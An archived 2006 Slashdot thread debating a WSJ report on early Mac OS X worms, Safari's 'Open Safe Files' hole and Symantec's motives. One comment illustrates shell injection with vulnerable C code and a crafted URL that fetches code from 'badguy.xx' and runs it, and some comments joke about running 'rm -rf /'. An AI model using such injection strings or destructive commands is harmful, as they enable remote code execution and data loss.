Forgot your password?
typodupeerror

Computer 'Worms' Turn on Macs 450

Posted by CmdrTaco
from the here-they-come dept.
Carl Bialik from WSJ writes "Macs have been laregly immune to the viruses, worms and malware that have plagued PCs, but the Mac's recent popularity uptick has meant that 'bad guys appear to be casing the joint,' the Wall Street Journal reports. Among the signs: two recently discovered worms and the discovery of a vulnerability in Mac OS X that leaves Safari open to a hack. A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows. 'Some security experts believe hackers are becoming more interested in writing nasty code for Macs precisely because of reports of its relative immunity to security woes,' the WSJ reports. 'Apple itself has gone out of its way not to promote the Mac's relative safety, lest it tempt hackers to prove the company wrong. Apple declined to discuss the topic of security in depth for this article.'"
This discussion has been archived. No new comments can be posted.

Computer 'Worms' Turn on Macs

Comments Filter:
  • Symantec? (Score:5, Insightful)

    by matt4077 (581118) on Monday February 27, 2006 @11:11AM (#14808255) Homepage
    A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows.

    Now there's a neutral party with no agenda when it comes to security!

    Honestly, the worst Mac malware I've seen so far had a Symantec sticker on the box.
    • Re:Symantec? (Score:5, Insightful)

      by dantheman82 (765429) on Monday February 27, 2006 @11:21AM (#14808364) Homepage
      Apparently, they've had slow sales on the Mac platform recently. Perhaps a real worm/virus in the wild would be some newsworth info...
      • Re:Symantec? (Score:4, Insightful)

        by peragrin (659227) on Monday February 27, 2006 @11:25AM (#14808404)
        a recently symantec update did more damage to users systems than the so called recent virus script looking like an image did to all the computers it actually attacked.

        So yea symantec sales would be slow.
      • Re:Symantec? (Score:3, Insightful)

        by l3prador (700532)
        Can anyone come up with a good reason why we rely on separate companies, who have a vested interest in there being dangerous virii out in the open so that people will buy their software? Why don't we hold the OS makers, who have a vested interest in their OS being free from these sorts of threats accountable for either eliminating vulnerabilities or providing their own anti virus software, as an integral part of the operating system? The only other source that could possibly be reliable would be the OSS c
    • Re:Symantec? (Score:4, Insightful)

      by twocents (310492) on Monday February 27, 2006 @11:24AM (#14808395)
      No kidding. Symantec would love their user base to expand, especially since MS is selling anti-virus software. It is legit to promote awareness of possible OS X exploits, but it ridiculous to rely upon any information from a company such as Symantec - they have a vested interest in scaring the hell out of people that don't know any better.
    • Agreed: If you want Mac malware, you have to go to a store and buy it.

      It's completely unacceptable that Slashdot editors would post this garbage. From the referenced article:

      "In the past two weeks, information-security companies like Symantec Inc., Sophos PLC and McAfee Inc. have identified several security issues related to the latest version of Apple's Mac operating system, called OS X. Among the concerns: two "worms," programs written by unknown hackers that were designed to spread themselves to other Macs through Apple's iChat instant-messaging software and Bluetooth wireless-communications capability."

      Translation: Some public relations drone, with no technical knowledge, paid the Wall Street Journal to post the article. The Wall Street Journal is a "What the rich want you to think" publication, and, in my experience, usually unreliable for anything useful. Note that the article jumps from subject to subject rapidly, apparently to hide the fact that there are no actual incidents of Mac infections to report.

      Another translation: Symantec, a maker of very buggy security software of poor design, and other "security" companies want Mac users to buy their products.

      Some people, in my opinion, spend their entire working lives being dishonest, trying to trick other people. In my experience some of them work for WSJ.

      -
      Cheney's company is rapidly [nytimes.com] building prisons [halliburton.com] for the U.S. government.
  • Immune? (Score:2, Interesting)

    by east coast (590680)
    Macs have been laregly immune to the viruses, worms and malware

    Just because no one has exploited a system doesn't mean it doesn't have exploits. I know about a month ago this came up in an article about how OSX/Linux users could face issues because they felt to secure. Hopefully they will be able to cut this off at the quick but don't think that running an "obscure" OS makes you safe. How many Mac users today run anti-virus software?
    • Re:Immune? (Score:5, Insightful)

      by SpooForBrains (771537) on Monday February 27, 2006 @11:14AM (#14808298)
      but don't think that running an "obscure" OS makes you safe

      *sigh* We don't. We think running an operating system with proper security makes us safe.
      • Or, you know, nicer software, better user interface, less learning curve for the parents and grandparents, better hardware, better industrial design, "UNIX inside ©" etc. IMHO, of course.
      • Re:Immune? (Score:2, Insightful)

        by somersault (912633)
        yep, the last exploit relies on people to be morons and try to open an apparent 'picture' from a random spammer, or a strange website/whatever. Which could happen with any OS. Except if the user isn't running with full admin priveleges then they are going to be fine anyway..
        • Re:Immune? (Score:4, Insightful)

          by IamTheRealMike (537420) <mike@plan99.net> on Monday February 27, 2006 @11:56AM (#14808706) Homepage
          No they aren't. You don't need admin privs to relay spam, hijack a web browser or force yourself to load at startup, which are just some of the things malware gets up to.

          I haven't seen any compelling evidence that Linux or MacOS X are more secure than Windows is against the twin threats of malicious software and badly trained users. They're all based on similar security ideas, which just don't cut the mustard. A better security model [plan99.net] does exist, but it's not implemented in any desktop operating system today.

    • How many Mac users today run anti-virus software?

      Running anti-virus software is a stupid thing to do when you can FIX the system instead.

      Just because Microsoft is at the "fix one bug, re-create another" stage doesn't mean Apple has to go the same road.

      An analogy - would you rather eat fresh, properly prepared food, or moldy infested crap and a megadose of antibiotics? (I would have used the "would you rather have sex with someone who isn't infected with HIV, or someone who is, but you take *precau

      • Re:Immune? (Score:3, Insightful)

        by east coast (590680)
        Running anti-virus software is a stupid thing to do when you can FIX the system instead.

        What's the phrase? There is no patch for human stupidity?

        Go ahead, be smug about it. But the bottom line is that as Mac becomes more popular you're going to have idiots who are going to let thing thru simply because they don't understand what they're doing. Do you really think that Windows user who keep their systems up to date and use a bit of common sense are the ones you're reading about? Windows is insecure in a l
        • I run antivirus software in Windows because Microsoft has unpatched bugs in their operating system that allow my machine to be infected by doing nothing other than being on a network, or, if I were using their browser, simply mistyping a URL and getting a malicious site, with no other intervention on my part. The only way my Mac will be infected is if I'm stupid enough to open up a file without vetting it first and type in my password when prompted. That's the difference in security between OS X and Windo
    • Exactly. Even as a mac user I shudder when I hear the phrase, "more secure". How can you quantify security. I would consider it to be a binary measure, either you are secure or you aren't. And the answer is you are not.
      Basically it all comes down to being smart when using your computer. First and foremost is never run anything in any sort of admin mode unless absolutely necessary. Most mac users create an admin account and use it for everything they do(and I hate to admit I am one of those), that i
    • Re:Immune? (Score:3, Insightful)

      How many Mac users today run anti-virus software?

      Hopefully very few. With the current state of affairs, anti-virus software for the Mac is a case of the cure being much worse than the disease. Even these recently discovered worms and the Safari vulnerability are relatively benign and can be protected against with a little common sense. In fact, most users hopefully are already safe from the Safari vulnerability since the "Open Safe Files" option was already the source of another vulnerability a while ba

    • What exactly does Mac anti-virus software do? There are still no real self-propagating malicious worms on the platform. Yes, AV software can check for a couple of Trojans and the usual collection of Office macro viruses, but I can avoid that stuff without AV software. Even if something really serious breaks out, the software won't do a damn bit of good until the anti-virus companies update their definitions. When there is a serious threat and the software actually blocks the threat, I will fork over the cas
    • Alright then, what OS makes us safe?

      I know OSX is safed by default than Windows. Its even safer than some Linux distros. That's not too shabby. I recommend an OS preconfigured with sane defaults like OSX or OpenBSD for computer illiterate users who want to access the internet. One could argue OSX is far more userfriendly than OpenBSD, atm, but some Linux distros are almost within their reach..

      If we recommend sane defaults maybe we can get some sleep at night, huh?
    • How many Mac users today run anti-virus software?

      Well, until just a few weeks ago, there was nothing to scan for, except Windows virusses! So what would the point have been?

      The major vendors have engines ready to scan, but things will have to get a whole lot worse and more regular before I will pay up and slow down my system with one of those bastards....

    • It's all about the Market Share. The larger the market share, the more people will take shots at you. So while security through obscurity is not truely secure, it does reduce you likelihood of being hacked.

      -Rick
    • I know about a month ago this came up in an article about how OSX/Linux users could face issues because they felt to secure.

      I dunno. How many Mac/Linux users still open attachments from strangers just because they can and say "HA HA! You couldn't do this on a Windows PC without getting infected by a virus! Now I shall post in the forums about my little adventure of opening unsafe attachments!"

      Seriously, most people are going on about this like Linux and Mac users like to browse google looking with the searc
  • by minus_273 (174041) <aaaaa@SPAM.ya h o o . com> on Monday February 27, 2006 @11:12AM (#14808263) Journal
    seriously if you have to manually download the program and enter your admin password, it is not a virus or a worm. I dont know why people keep calling it that. It is a Trojan and those have existed since the first rm -rf / script.
    • How hard would it be to convince some average uses that the worm/virus/trojan that they're downloading is actually an amazing tool to "tweak" some aspect of their computer's performance (internet/speed/ram/etc...)?

      Any such program could say that it just needs you to enter your password so that it can perform its miracles on your system, and let you have a faster compurer without paying for it.

      Everyone wants something for free, and there are enough average users that don't know any better.

      The social engin
      • you can't really patch social engineering and it isnt the fault of the OS is it? I am sure there are things apple can do to limit the damage, but once a person has entered the password voluntarily in sudo, there is really not much you can do to stop it.
        • Thats my point though. If everyone suddenly switched from windows to OS X, then you're going to have some of the same problems. You may not have worms cloging the internet like you do now, but chances are you'll still have to routinely clean up your neighbours/friends/relatives computers because of the nasty stuff that came in through the front door.
      • by AKAImBatman (238306) <akaimbatman.gmail@com> on Monday February 27, 2006 @11:31AM (#14808467) Homepage Journal
        How hard would it be to convince some average uses that the worm/virus/trojan that they're downloading is actually an amazing tool to "tweak" some aspect of their computer's performance (internet/speed/ram/etc...)?

        The difference between the security hole approach and the social engineering approach, is that the latter starts and ends with stupid users. The worm cannot force its way onto the computers of more savy users like the RPC worms in Windows did. Instead, it will set off a huge number of warning flags with more experienced users, and perhaps prompt them to take action to clean other user's computers or encourage them not to run anything that asks for their password.

        The end result is that such viruses could not spread as fast or as far as their Windows counterparts.
    • In that case you just shaved several thousands off the present number of Windows viruses as most 'viruses' these days are actually malware attached to emails.

      Personally I would call them a 'viral trojan'.
      • .....'viruses' these days are actually malware attached to emails.....

        Except that opening the file on a Mac will not automatically install malware without asking for a password. All but totally stupid Mac users already know that opening a media file should not require for them to type a password. Turning of the Safari auto open capability and setting Mail to only display plain text messages makes opening mail and surfing the web much safer. None of our Mac users know the admin password and that gives anothe
    • A worm propagates by itself without user intervention. While at first glance it may seem that means the user doesn't have to run it in the first place, that's a common misconception. What it means is, once the program is active it is then able to spread itself via the network without user intervention. Unlike a virus, once active, merely infects files which then must be transferred to another computer from the original infected computer manually by the user.

      The difference in a virus and worm is the method o
    • Granted it's a trojan, but it's a Trojan that is being passed virally... ie: once downloaded by the first ignoramus, it attempts to re-distribute itself via Address Book (the equivalent of Outlooks contact list) and iChat (IM messenger app with hooks into AOL, .Mac and Netscape) whereby it becomes a virally transmitted trojan so that other victims can proceed to clicky-click it, thinking it is from a trusted source and thereby starting the process over... with their Address Book of targets...

      Pretty nasty IM
    • by Dausha (546002) on Monday February 27, 2006 @12:42PM (#14809180) Homepage
      "It is a Trojan and those have existed since the first rm -rf / script."

      I don't get it. I tried running the "rm -rf /" script, and got nothing. I tried it again as root. It just sat there and worked patiently for a few minutes before returning a prompt. Was it supposed to do something cool? If so, maybe I should have run it on a desktop instead of the production server? Any hints at what I did wrong?

      Maybe I should try it on my Windows machine next? Shouldn't I type "C:\" instead? Or, is this script not that portable?
  • ...but I digress. Regular updates, safe web browsing, and not clicking email links should be the norm anyway regardless of operating system. Of course "safe web browsing" means different things to different people.
  • So the virus turns the computer on, even after they've been shut off? Thats pretty cool.
    • So the virus turns the computer on, even after they've been shut off? Thats pretty cool.
      Dude, that's not a bug, it's a feature.

      WakeOnLan has been doing this for years.

      (Don't blame Taco for the misleading headline, editors at the WSJ can screw up too)
  • Every reporter that misclassifies trojans and viruses as worms needs to be beaten over the head with a herring.

    Worms are very different than viruses. Don't mix them up! It's not that hard!
  • by pHatidic (163975) on Monday February 27, 2006 @11:14AM (#14808291)
    Windows has had what, like 200,000 Virus's in the last year? Apple has had two or three theoretical exploits that either require the user to run code by hand or else target services that most mac users don't turn on. Sounds like Apple is doing its job to me. And honestly this idea that as Apple gets more popular there will be more viruses is largely a load of crap. The notoriety of writing the first real virus for OS X would be vastly more than for writing yet another windows virus. The reason why no one writes viruses for Apple is most likely because people like Apple and want them to succeed. I think if people start writing viruses for Apple it will be because Apple gets lazy and stops innovating, or else stops at least trying to fix the bugs in its software. Because right now both the means and the motive or there, but it's just not really happening.
    • by djtack (545324) on Monday February 27, 2006 @11:38AM (#14808535)
      The reason why no one writes viruses for Apple is most likely because people like Apple and want them to succeed.

      Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds. More likely, the profit motive isn't there, probably a result the combination of greater security on OSX, and smaller installed base.
      • Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds.

        All of those require infection of a system, which requires the virus/Trojan/worm to copy itself from one system to another. The increasing number of Macs creates more dead-ends for a proliferating virus.

        Imagine two situations. In the first, everyone is using a Wi
    • And its not like symantec have a vested interest in making out that apple is insecure so they can sell more dody AV and firewall products, or anything...

  • Most of the "worms" I've seen on Mac haven't actually been worms. They come in via safari and are disabled by unchecking a checkbox. It's not like the windows worms where they have a service that nobody uses listening on a port that is able to execute the code. And it doesn't trash the system because you don't have root access on by default.
  • by hattig (47930) on Monday February 27, 2006 @11:15AM (#14808314) Journal
    I guess this will test whether Apple's approach to security (i.e., pretty much like Unix's) is better or worse than Microsoft's.

    I.e., will these worms affect the whole computer because of a fault in the operating system, or will they affect only a single user on the computer because of a software issue that let the worm in to play in that user's space, or will it affect people only because of user stupidity ('ooh, really, clicking on this will make my pen0r bigger!')?

    Note that Microsoft gets critical security issues fairly often with their approach.

    The recent Apple issues have been lowest rated security issues.

    Certainly I think that not having users run as root by default will help Mac OS X, but that doesn't stop them entering their password when prompted.

    You can't secure against user stupidity except by scanning each file that they try to execute for viruses. And that means virus checkers, and the associated slowdowns they bring.
    • Certainly I think that not having users run as root by default will help Mac OS X, but that doesn't stop them entering their password when prompted. You can't secure against user stupidity except by scanning each file that they try to execute for viruses. And that means virus checkers, and the associated slowdowns they bring.

      I disagree. Creating a blacklist of malware is a way to make machines more secure, but it is only one third of the equation. In addition modern OS's should be implementing jails, A

    • The unfortunate thing is that for most PC's out there, they really only use one account; and from my small exposure to Mac users they tend to use even fewer system accounts. So in that sense they can't take over the entire box, but if all the stuff you cared about in your system now gone, having an OS still there doesn't really give one any relief. In the grand scheme of things there is no difference, if all my docs are gone and I've got to reinstall the entire OS, or I've got an OS but all my docs are st
  • Folks don't need to worry.

    Using google images as a definitive source, I tried the following searches

    Microsoft worm

    and

    apple worm

    Surprisingly the Microsoft one was filled with warning messages and exclamation marks and maggots.

    Meanwhile the apple one was all cutesy and cartoony and fluffy (some of the worms even appear to be wearing turtle necks)

    The world will continue to turn.
  • A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows.

    Well, yeah... Symantec has kind of a vested interest in gradually eroding that idea, don't they?
  • by endrue (927487)
    Every piece of code is subject to exploits. Show me a program/OS that is 100% infallible and I will show you a liar. I think that the main reason OS/X (and *nix for that matter) was considered to be rock-solid is because very few people were taking shots at it. Now I do realize that *nix-based OSs do plug up the obvious holes that MS left open. But don't assume that just because no one has broken into your house yet that your house is completely secure.

    A computer is only as secure as its maintainer.
    • Of course doing stuff in Linux rarely requires root access, unlike Windows. Now you can blame the app designers if you like (and I do), but setting an app to run as root while the rest of your work is done as a limited user is very easy in Linux, however I've yet to find a way on XP Home. Run As just isn't good enough, anything that runs at start up can't be set to run as a different user, and you also can't set it to be default behaviour, you have to keep doing Run As each time.
      I bet the Wintrolls will now
    • Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid.

      It's not that Linux is secure. It's that Windows is *insecure*.

      Microsoft had a long period (perhaps over?) where they introduced *horribly* insecure designs -- making decisions that completely ignored security in the name of any shred of functionality that they might gain. (And those designs still affect us today.) Double-click execution of executables in email, using their full-bl
    • by 99BottlesOfBeerInMyF (813746) on Monday February 27, 2006 @12:32PM (#14809076)

      Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid.

      Why is that stupid? There are real architectural, operational, testing, and implementation differences between Windows and Linux. Obviously one of them is more secure and less likely to be compromised than the other. There is nothing stupid about looking at those differences and at the track record of both OS's and making predictions and making usage decisions based upon that information. "They're all the same," is the argument of a lazy man or someone trying to justify a bad choice by trying to make all choices look equally bad.

      The same thing applies with this story - Macs can be exploited because that is the nature of the business. We usually find the holes because some numbnut exploits it.

      No one is arguing that Macs can't be exploited. They certainly can be and are. We do not, however, find most exploitable holes by seeing exploits in the wild. The majority of holes are discovered by developers coding the products. The next largest chunk are found by users and legitimate security researchers. Then a few are found when they are exploited in the wild by hackers. How many zero day exploits have their been for Linux or OS X? The answer is very, very few if any. There have been some for Windows, but most of the underlying vulnerabilities were probably discovered by MS, but they just did not get around to fixing them.

      Sure there will be exploits and even zero-day exploits for OS X, but they are just not likely to spread widely or be much of a problem for the average user. If they are a large threat they will be well-known and quickly fixed. A major worm for OS X would be news and it would be unusual. For Windows it is business as usual.

      But don't assume that just because no one has broken into your house yet that your house is completely secure.

      This is a very good analogy. My house is concrete block and was built with only glass block windows on the first floor. Actually the block is two thick on the first floor. Before I bought it, someone had wired a security system and outdoor flood lights. A few months back someone busted into my shed, but ran off without getting anything. The items in my shed are relatively large an not all that valuable.

      I'd say that is a good analogy for OS X. It is built with security in mind on well tested, industrial grade framework. They have added onto it and made it more secure in some ways and less secure in others, but it will likely never be as insecure as the neighbor's ranch style place with two plate glass doors and a key under the mat that you see the kids get out every day.

      OS X had someone break into the shed (try to distribute a trojan) but nothing has been taken. It is a good sign that maybe Apple and OS X users should be paying attention and maybe doing some more security reviews, but it is in no way comparable to the apartment complex down the street that have been burgled at least once a month for several years and where we always hear about people getting shot.

  • Mac's are not "immune" to anything.

    They are not "targeted" due to their small market share. They are also not targeted due to the fact that they keep changing OSs, processors and whatnot such that any Mac (OSX PPC, OSX x86, OS9 PPC, OS9 Moto) is a subset of an already small market share.

    Windows is a huge bullseye due to is truly massive installed base. Linux will be the next target.
    • False logic. That is like saying that if tanks were more popular they would be less secure than than light armored vehicles. While tanks may get shot at more if there were more of them around to be targets, it has absolutely nothing to do with how much damage the tank suffers. Popularity is not the same as security. Just because you are more of a target, doesn't make you any more vulnerable to the attacks.
  • ...bad guys appear to be casing the joint...
    Dang! Well, back to OS/2 for that good ol' "security by obscurity" strategy.
  • There are like 4 steps to protecting yourself against viruses on Macs:

    1) Leave your firewall on as many ports as possible. Only open it on non-major ports when you're actually using them (it's so easy to change if you want to)
    2) Block images in email and don't open DLed crap.
    3)Don't run as Admin. make a new account, check the admin box, and uncheck yours.
    4)If you're super-paranoid, change the privledges to Terminal to take away everyone's access except root.

    These steps literally took 3 minutes on Tige
  • I've got your "bird" right here, Symantec.
  • The worms didn't appear to inflict any meaningful harm on Macs -- they required users to go through several steps on their computers before being infected.

    Doesn't the fact that they require user intervention to propogate make them not worms but trojan horses? Every OS is vulnerable to those, from Irix to Windows.
  • ...use RAID [apple.com]
  • Personally, these two "worms" for OS X don't worry me too much. They both seem to require user interaction inorder to infect the system. What will really be of concern is a worm that can spread without the user being involved in any way. Personally, I think that OS X is much less likely to suffer from exploits of this type than Windows.
  • by jht (5006) on Monday February 27, 2006 @11:28AM (#14808432) Homepage Journal
    It's never been that (at least for most people). The advantage of Mac OS X is that it is less vulnerable than Windows (making Windows an easier target), and that Apple made decisions in the design process that mean that the typical consequences of a flaw are less severe. In recent years, Microsoft has attempted to harden Windows further and reduce their exposure - in W2K3 Server, for instance, they've done a pretty good job of it.

    Even if Apple magically pulls some sort of super OS-jujitsu that reverses their market share and Microsoft's, the basic architecture will stay the same underneath - and that means Apple will have their relative advantages intact for the foreseeable future. Windows is, as its heart, an OS that has traded off many security options for ease of access and ease of programming. Apple had the advantage of seeing what was already happening to Windows when they made their decisions about how OS X would be designed, plus the system it was derived from was pretty robust to begin with.

    There will be viruses that attack Mac OS X. Some will do a pretty good job of attacking. I'm kind of surprised it's taken this long to get there. But I'm also not expecting it ever to compare to Windows in that regard.
  • Some security experts believe hackers are becoming more interested in writing nasty code for Macs precisely because of reports of its relative immunity to security woes

    This is what I've been saying for a while. Really, it's kind of a self-evident thing. Let's face it, the hacker (and/or cracker) mentality is often to do things to see if/because it's possible. It's the entire point. Just like government targets have historically been more tempting because they're supposed to be more secure, the more 'impossi
  • Folks,

    The key thing to eyeball here, with all the FUD that has been stirred up, is there are OS vulnerabilities and application vulnerabilities. Much like the annual brew-haha when we comapre Linux versus Windows, you must make a clear differentiation.

    Like Linux, I would never count, say an Apache hole against Mac nor Linux, since it's an application that is added after a base install. However, unlike Mac or Linux, Windows flaws are very much a hybrid. Windows really doesn't function much as Windows without
  • The day that I don't have to enter an admin password to modify a file in one of the root directories is the day that I start worrying about security on my Mac.

    -ch
  • by Kaimelar (121741) on Monday February 27, 2006 @11:33AM (#14808488) Homepage
    A recent columnist at Wired said what I was thinking already [wired.com]:

    From the linked article:

    "These Mac security holes are a storm in a teacup. They've inspired hundreds of stories in the press and even the national network news, but if they were Windows holes, no one would have blinked.

    That's because holes in Windows are routine, business as usual, while it now appears the Mac is under attack thanks to Apple's brand-new high profile. But this isn't the case.

    Last month, there were four "massive" virus attacks on Windows, according to Commtouch, an antispam and antivirus vendor. Indeed, viruses are now so aggressive, they routinely outpace attempts by antivirus companies to distribute protective signatures.

    This state of affairs is now so common, I hadn't noticed -- and I work for a technology news site. "Virulent computer virus infects millions worldwide, other non-news at 11."

    These Mac "threats" are only news because of their novelty, not the threat level they pose."

    • 40,000 people are killed in auto accidents every year in the U.S. and the only news it creates is the story about the traffic jam that it causes. But if a plane or train has one and a few people die, it makes big news and people become afraid to travel of plane or train.
  • Computer 'Worms' Turn on Macs

    Worst. Switch Ad. Ever.

  • As MS gives up its last true monopoly! ;)
  • ...what turned on Macs as a sexy iPod, just waiting for it's upload.

    I guess it's hard to compete with an "agressive worm".

  • ..the definition of FUD?!

    Seriously, it seems liek every week that I read a slashdot article which proclaims that the days of the virus-free Mac environment are numbered, and that Mac users will soon be the number 1 target of the malware writers. It seems that if you can use the words "Mac" and "virus" ** in the same article then you're bound to get it posted on some tech news-sh^Hite. Then give it two or three days and virtually the same article will pop-up on the BBC's website with even more inflated dir
  • by plopez (54068) on Monday February 27, 2006 @11:49AM (#14808632) Journal
    Typical 'man bites dog' approach. If it is unusual, it is news. Microsoft Windows is a bug ridden unsecure OS, but since everyone (or at least 90% of users) use it it is not news. No one questions why a defective product exists or what it is actually costing in lost productivity. It is normal in most users' worlds, those users who never have experienced anything else.

    OS X exploits are news only because they are unusual (though it does serve as an early warning, I sincerely hope Apple is busy auditing their code base). The fact that they are not as severe as Windows exploits, requires more user intervention and are often limited in scope are not discussed or probably understood by most people.
  • According to the Reg the OS X security exploits are largely academic [theregister.co.uk] and not serious threats.

    For the foreseable future Microsoft Windows will remain a huge security risk [msversus.org].
  • I wonder if/when the new intel-macs will have dual-booting abilities and you are able to install Vista, or worse XP, on them, could this make the Apple-OS more vulnerable? I'm thinking rootkit-like virusses and assuming that Vista-security could be lacking.
  • Windows runs about 90% or more of all desktops. Apple and Linux make the vast majority of the remainder with everyone else totalling probably less than 1% of all desktops. As a result, if someone writes a virus, they more likely than not own a Windows machine, and thus have the capacity to target it. Also, there being lots of Windows desktops and the infection vector is larger it's a bigger target.

    As most malware attacks are for profit these days, the Windows environment, with its huge level of insecuri

  • Argh, what crap (Score:4, Insightful)

    by ThousandStars (556222) on Monday February 27, 2006 @12:34PM (#14809104) Homepage
    I already had a relative send me a link to this article. I'll copy my e-mail response:

    The guy who wrote this article doesn't know what he's talking about. "Worms" spread without any user interaction -- they can infect millions of machines on the internet in hours. Those are the kind of vulnerabilities that got Microsoft in trouble in 2003. Viruses require user interaction to work. All the "vulnerabilities" described in the article require the user to install a program and it's trivially easy to be destructive once you have the user's trust.

    In addition, virtually all the vulnerabilities described by the article are local ones -- meaning a malicious person needs access to the machine. Truly dangerous vulnerabilities offer remote access, which means any random hacker on the Internet can control the machine from afar. AFAIK, none have been discovered in most Linux distributions or OS X. If OS X did ship with remote vulnerabilities, THAT would be huge news.

    The only relevant part of the article comes at the very end:

    Many viruses and worms, for instance, don't exploit security holes in operating systems. Instead, they use what are called "social engineering" techniques to trick users into doing things that they shouldn't do, like unwittingly installing programs. The Anna Kournikova worm from 2001, for example, infamously tricked Windows users into installing it by masquerading as photos of the leggy Russian tennis star attached to e-mails.

    Rather than weaknesses in operating systems, such approaches exploit "a bug in peoples' brains, which is much harder to patch," Mr. Cluley says.

    That should have been the lead. The rest of the article is idiotic.

  • Among the signs: two recently discovered worms and the discovery of a vulnerability in OS X that leaves Safari open to a hack.

    The only worms I've seen announced for OS X so far have depended on social engineering attacks. Social engineering attacks are possible on any OS, because they work by convincing a user to do something. They're basically the same kind of "security hole" as the one the folks claiming to be an exiled dictator with a bundle of cash...

    The central security hole* found is one that was discovered almost two years ago, and Apple has refused to fix. That security hole is the use of the desktop shell interface to run programs to display untrusted content. As I wrote at the time [scarydevil.com] this is fundamentally insecure, and yet the native browsers and third party ones still do it.

    This is the same kind of error as having a browser on UNIX run an external viewer for a link with code like this:
    run_application_on_url(char *app, char *url)
    {
      char *buffer = malloc(strlen(app)+strlen(url)+6);
      if(!*buffer) panic("Out of memory on malloc");
      sprintf(buffer, "%s \"%s\" &", app, url);
      system(buffer);
    }
    That would be a security hole you could drive a truck through, because you don't know what the shell is really going to do with whatever the URL contained. Maybe it looks like benign.pdf?";curl http : //badguy.xx/exploitcode>/tmp/...;sh /tmp/..." .

    Well, Safari doesn't really know what the shell (LaunchServices) or the app it calls is going to do, either. It's not quite as obviously bad as the above code, but it's subject to the same kinds of attacks. As has been shown multiple times already on both OS X and Windows.

    What's safe?

    Well, there's two options.

    1. Safari can maintain its own database of safe applications to pass unsafe files to, and call them directly rather than through LaunchServices.

    2. Apple can provide an alternate LaunchServices for unsafe content that ONLY contains applications that are explicitly designed for handling unsafe content, or alternatively add an option to LaunchServices saying that the content is unsafe so it can use an alternate database.

    Here's some options that have been tried and don't work:

    1. Maintain a list of file types and suffixes that you consider "safe", and only use LaunchServices to open these files (Safari and Firefox and IE do this).

    2. Modify LaunchServices to try and figure out when an application is being launched on an "unsafe" document, and ask the user if they really want to do this (Apple's 'fix' for the original hole, which has already failed twice).

    3. Maintain a list of locations that are "safe" and "unsafe", and only allow dangerous actions based on the location (Microsoft's Security Zones).

    So far Apple's tried two of these, let's hope they don't try the third.

    * Exacerbated by two other holes: making "Open Safe Files" the default, and considering archives to be "safe" files.
  • by HermanAB (661181) on Monday February 27, 2006 @01:19PM (#14809580)
    Windows is so far ahead in the malware world, there is no way that any other system will ever catch up to the hundreds of thousands of viruses, worms and trojans that is essential to the full Windows experience.
  • by Shanep (68243) on Monday February 27, 2006 @02:31PM (#14810258) Homepage
    Symantec speaking baddly of Macs should work for them both ways. Prevent people from switching away from the arch they sell most product for AND frighten Mac users into buying their crap.

    They will only be able to demonize Mac's for so long, until people realise that they are harder to exploit on a large scale because they come with less insane defaults.

    BTW, if you really REALLY want to fuck up your Mac install... install some Symantec products. A serious downgrade.

Prediction is very difficult, especially of the future. - Niels Bohr

Working...